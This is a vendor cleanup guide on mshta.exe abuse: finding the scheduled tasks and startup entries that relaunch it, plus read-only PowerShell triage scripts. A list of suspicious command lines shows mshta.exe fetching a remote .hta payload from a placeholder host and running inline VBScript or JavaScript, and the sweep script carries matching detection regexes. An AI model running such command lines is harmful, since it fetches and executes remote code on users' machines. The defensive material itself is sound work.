mshta.exe Malware Removal: Blank Window and Scheduled Task Fix

Stephanie Adlam
mshta.exe malware removal starts by finding the scheduled task, startup entry, or script that launches the legitimate Windows host.

mshta.exe is usually a legitimate Windows component, not the malware itself. The danger starts when a scheduled task, startup entry, browser-delivered command, fake update page, or script uses mshta.exe to launch a remote HTA file or hidden JavaScript/VBScript. Do not delete C:\Windows\System32\mshta.exe or C:\Windows\SysWOW64\mshta.exe. Find and remove the launcher that keeps calling it.

If you are checking an unknown executable rather than a Windows-signed system component, the Tin.exe safety guide shows how to weigh file path, publisher signature, startup persistence, and scan results before deleting it.

For unknown VBS startup entries, use the same path, hash, and autostart-entry approach in the sdaCollector.vbs safety checklist. If the suspicious launcher calls Microsoft .NET tooling instead, the RegAsm.exe safe path and malware signs guide shows what to check before deleting anything.

Quick checks for mshta.exe malware removal

  • Check the path first. Microsoft-signed copies in C:\Windows\System32 and C:\Windows\SysWOW64 are expected. A copy in Downloads, Temp, AppData, or a random folder is suspicious.
  • Check the command line. Treat mshta.exe followed by a URL, obfuscated script, encoded text, or a strange local .hta file as a strong lead.
  • Look for persistence. Task Scheduler, Startup Apps, Run keys, browser extensions, notification permissions, and recently installed apps are common places to inspect.
  • Scan and verify. Use Gridinsoft Anti-Malware after saving the alert details, then reboot and confirm that the blank window or outbound block does not return.

Process name: mshta.exe, Microsoft HTML Application Host
Normal location: C:\Windows\System32\mshta.exe or C:\Windows\SysWOW64\mshta.exe
Suspicious sign: Remote URL, hidden script, recurring blank window, blocked outbound connection, or task that relaunches it
Best first action: Do not delete the Windows file. Identify the parent process, task, startup item, or browser source.

Is mshta.exe a virus?

No, the normal Windows copy of mshta.exe is not a virus. It is the Microsoft HTML Application Host, used to run HTA applications. Security teams still watch it closely because attackers can abuse it as a trusted Windows utility to run malicious HTA, JavaScript, or VBScript content. MITRE tracks this abuse as System Binary Proxy Execution: Mshta and notes that mshta.exe can execute local files, inline scripts, and remote URLs [1].

That distinction matters. If a firewall, antivirus, or another security tool says mshta.exe is involved, the file path alone is not enough. The command line, parent process, network destination, and repeat pattern tell you whether a legitimate Windows binary is being used by malware.

Why mshta.exe can create a blank window

A blank mshta.exe window often appears when the launcher still exists but the remote HTA page, payload, or script it tries to load is gone. The scheduled task or startup command fires, mshta.exe opens, and the content fails to load. That is why the window can come back every few hours even after a scanner removed a downloaded payload.

MSHTA abuse commonly appears in fake CAPTCHA, fake download, loader, and infostealer chains because attackers can call a trusted Windows binary instead of dropping an obvious executable first. For home users, the practical takeaway is simple: a recurring mshta.exe symptom is usually a launcher problem, not a reason to delete Windows files.

How to remove mshta.exe malware safely

  1. Save the alert details. Note the time, path, command line, parent process, blocked domain or IP, and the user account. If a security tool shows Behavior:Win32/Interhta.Int or another script-behavior alert, keep the item quarantined while you investigate.
  2. Verify the file path and signature. Right-click the process or file, open its location, and check Properties. A Microsoft-signed file in System32 or SysWOW64 is expected; a lookalike in a user folder is not.
  3. Inspect Task Scheduler. Look for recently created tasks, random names, tasks that run at logon or every few minutes, and actions that call mshta.exe, powershell.exe, wscript.exe, cmd.exe, a URL, or a script in AppData/Temp.
  4. Check startup and browser sources. Review Startup Apps, installed apps, browser extensions, notification permissions, and recent downloads. Fake updates and ClickFix pages often start in the browser before they create persistence.
  5. Use Autoruns for a broader view. Microsoft Sysinternals Autoruns can show logon entries, scheduled tasks, services, browser helper objects, and other autorun points in one place [2]. Disable only entries you can tie to the symptom or a known unwanted app.
  6. Run a full malware scan and cleanup. Use Gridinsoft Anti-Malware to detect and remove the malicious script, loader, browser hijacker, scheduled-task entry, or unwanted app that is calling mshta.exe. Reboot after cleanup.
  7. Confirm it is gone. After reboot, reconnect to the internet and wait through the previous trigger interval. The blank window, security alert, or outbound block should not return.
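
Steps 1 and 2 can be captured in one read-only pass while the mshta.exe window is still open. This PowerShell snippet is an added example, not part of the original guide or of any Gridinsoft tool; it uses built-in cmdlets and assumes Windows PowerShell 5.1 or later.

```powershell
# Added example: triage of running mshta.exe instances. Read-only, changes nothing.
$expected = @(
    "$env:SystemRoot\System32\mshta.exe",
    "$env:SystemRoot\SysWOW64\mshta.exe"
)

Get-CimInstance Win32_Process -Filter "Name = 'mshta.exe'" | ForEach-Object {
    $proc   = $_
    $parent = Get-CimInstance Win32_Process -Filter "ProcessId = $($proc.ParentProcessId)"
    $owner  = Invoke-CimMethod -InputObject $proc -MethodName GetOwner
    # ExecutablePath can be empty when the session is not elevated.
    $sig    = if ($proc.ExecutablePath) { Get-AuthenticodeSignature -FilePath $proc.ExecutablePath }

    [pscustomobject]@{
        Time         = Get-Date -Format s
        ProcessId    = $proc.ProcessId
        Path         = $proc.ExecutablePath
        ExpectedPath = $expected -contains $proc.ExecutablePath
        Signature    = $sig.Status
        Signer       = $sig.SignerCertificate.Subject
        CommandLine  = $proc.CommandLine
        ParentName   = $parent.Name
        ParentCmd    = $parent.CommandLine
        # PIDs are reused: a "parent" started after the child is a different process.
        ParentValid  = $parent -and $parent.CreationDate -le $proc.CreationDate
        User         = "$($owner.Domain)\$($owner.User)"
    }
} | Format-List

# Lookalike copies outside the Windows directory (user profile only, to keep the search short).
Get-ChildItem -Path $env:USERPROFILE -Filter 'mshta.exe' -Recurse -Force -ErrorAction SilentlyContinue |
    Select-Object FullName, CreationTime, Length
```

An empty first result means no mshta.exe process was running at that moment; any result from the second command is a copy in a user folder and deserves a closer look.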

How Gridinsoft helps block and treat mshta.exe abuse

Gridinsoft Anti-Malware is useful in two parts of this incident: prevention and treatment. With real-time protection enabled, it can stop suspicious downloads, malicious scripts, loaders, browser hijackers, and other components that try to start a chain through mshta.exe, PowerShell, or scheduled tasks. If the chain already ran, the full scan is the treatment step: it checks common persistence points, detects the dropped payload or unwanted app, and removes the entries that keep relaunching the blank window or outbound connection.

Use the Gridinsoft Online Virus Scanner for a suspicious file before execution, and use Gridinsoft Anti-Malware when the system already shows recurring mshta.exe activity, security warnings, blank windows, or blocked outbound traffic.

Run a full system scan after manual cleanup.

After uninstalling the suspicious app or deleting the visible threat, use Gridinsoft Anti-Malware to check hidden files, startup entries, scheduled tasks, bundled apps, browser changes, and other persistence points that can restore malware.


For a domain-specific example of a browser tab opened by cmd.exe, see the Pop-broker.com redirect cleanup guide; it focuses on fake updater tasks such as GoogleUpdateDaily.

Where to look for the launcher

Task Scheduler: Tasks with random names, hidden actions, logon triggers, or commands that call mshta.exe with a URL. If the launcher is an unknown executable such as RuntimesHost.exe instead, use the RuntimesHost scheduled-task cleanup guide to remove that exact persistence pattern.
Startup folders and Run keys: Entries pointing to AppData, Temp, Downloads, scripts, or unknown helper apps.
Browser extensions and notifications: Extensions or allowed notification sites added around the time the popups started.
Recent downloads: Cracks, mods, fake updates, fake installers, ZIP archives, password-protected archives, or copied commands.
Security logs: Security-tool history, firewall blocks, EDR alerts, and outbound destination details.

Suspicious mshta.exe command lines

Legitimate HTA use is uncommon on most home PCs. Treat these patterns as suspicious until proven otherwise:

mshta.exe http://example[.]com/payload.hta
mshta.exe https://example[.]com/file.mp4
mshta.exe vbscript:Execute(...)
mshta.exe javascript:...
C:\Users\...\AppData\...\mshta.exe

A remote URL after mshta.exe is especially important. So is a command that starts from a scheduled task, a fake update page, a cracked installer, or a script that also opens outbound PowerShell connections. If you saw the issue after a game mod, crack, private build, fake Chrome update, or copied Run command, also follow the account-safety steps in our infostealer cleanup guide.
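
The launcher locations and the command-line patterns above can be checked together. This read-only PowerShell sweep is an added example, not code from the original guide; the rule names, regexes, and the Get-LauncherFlag helper are illustrative assumptions built from the patterns listed on this page, and it covers scheduled tasks and Run keys only.

```powershell
# Added example: read-only sweep of scheduled tasks and Run keys. Nothing is changed.
# Rule names and regexes are assumptions derived from the patterns on this page.
$rules = [ordered]@{
    'remote URL'         = 'https?://'
    'inline script'      = '\b(vbscript|javascript):'
    'script host'        = '\b(mshta|powershell|wscript|cmd)(\.exe)?\b'
    'HTA file'           = '\.hta\b'
    'user-writable path' = '\\(AppData|Temp|Downloads)\\'
}
function Get-LauncherFlag([string]$CommandLine) {
    # Expand %APPDATA%-style variables so the path rule sees the real location.
    $expanded = [Environment]::ExpandEnvironmentVariables($CommandLine)
    foreach ($name in $rules.Keys) { if ($expanded -match $rules[$name]) { $name } }
}

$entries = @()
foreach ($task in (Get-ScheduledTask)) {
    # Only exec actions carry Execute/Arguments; COM-handler actions are skipped.
    foreach ($action in ($task.Actions | Where-Object { $_.Execute })) {
        $entries += [pscustomobject]@{
            Source  = 'Task'
            Name    = $task.TaskPath + $task.TaskName
            Command = "$($action.Execute) $($action.Arguments)".Trim()
            Detail  = "author=$($task.Author); registered=$($task.Date); state=$($task.State)"
        }
    }
}
$runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
foreach ($key in $runKeys) {
    $item = Get-Item -Path $key -ErrorAction SilentlyContinue
    if (-not $item) { continue }
    foreach ($valueName in $item.GetValueNames()) {
        $entries += [pscustomobject]@{
            Source  = 'RunKey'; Name = "$key\$valueName"
            Command = [string]$item.GetValue($valueName); Detail = ''
        }
    }
}

# More flags on one entry means a stronger lead; a single flag alone is often benign.
$entries | ForEach-Object {
    $flags = @(Get-LauncherFlag $_.Command)
    if ($flags.Count -gt 0) {
        $_ | Select-Object @{ n = 'Score'; e = { $flags.Count } },
                           @{ n = 'Flags'; e = { $flags -join ', ' } }, *
    }
} | Sort-Object Score -Descending | Format-List
```

Run it from an elevated prompt so tasks registered for other accounts are listed, and record the matching entries before disabling anything.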

What not to do

  • Do not delete the System32 or SysWOW64 copy just because it appeared in Task Manager. That can damage Windows behavior and does not remove the launcher.
  • Do not restore quarantined items to “test” whether the alert was real. Save the details first, then scan and verify.
  • Do not allow a blocked outbound connection only to stop notifications. The block is useful evidence.
  • Do not reinstall Windows immediately unless cleanup fails, system files are damaged, or credential theft risk is high. Check persistence first.

After cleanup: accounts and prevention

If the mshta.exe event followed a fake CAPTCHA, fake update, pirated installer, cracked game, Discord/Telegram lure, or suspicious archive, assume an infostealer may have run. Clean the PC first. Then use a clean device to change email, Microsoft, Google, banking, crypto, gaming, and messaging passwords. Revoke active sessions where possible and enable MFA.

For prevention, keep Windows and browsers updated, avoid copied Run/PowerShell commands from websites, do not install cracked software, and treat sudden “verify you are human” instructions that ask for Win + R as hostile. Keep Gridinsoft Anti-Malware real-time protection enabled so suspicious downloads and script-based launch chains are blocked before they become a recurring cleanup problem.

FAQ

Should I delete mshta.exe from System32?

No. The normal Microsoft-signed mshta.exe in C:\Windows\System32 or C:\Windows\SysWOW64 is a Windows component. Remove the task, script, browser entry, or unwanted app that launches it.

Why does a blank mshta.exe window keep popping up?

Most recurring blank windows come from a scheduled task or startup command that still calls mshta.exe. The remote payload may be offline, but the launcher remains and keeps opening an empty host window.

Is Behavior:Win32/Interhta.Int the same thing as mshta.exe malware?

It is related but more specific. Behavior:Win32/Interhta.Int is a script-behavior alert that often appears when suspicious activity uses mshta.exe. This page covers the broader cleanup of the process and its symptoms.

Can mshta.exe steal passwords?

mshta.exe itself is only the host. The script or payload it launches can download stealers, loaders, or remote commands. If the event followed a fake update, crack, or copied command, clean the PC and secure accounts from a clean device.

Related startup-file case: if the suspicious startup item is not mshta.exe but a numbered file such as eld4.exe in AppData/Local/Temp, treat it as a separate Temp-loader cleanup path.

References

  1. MITRE ATT&CK. “System Binary Proxy Execution: Mshta (T1218.005).” MITRE, accessed May 26, 2026. https://attack.mitre.org/techniques/T1218/005/
  2. Microsoft Sysinternals. “Autoruns for Windows.” Microsoft Learn, accessed May 26, 2026. https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns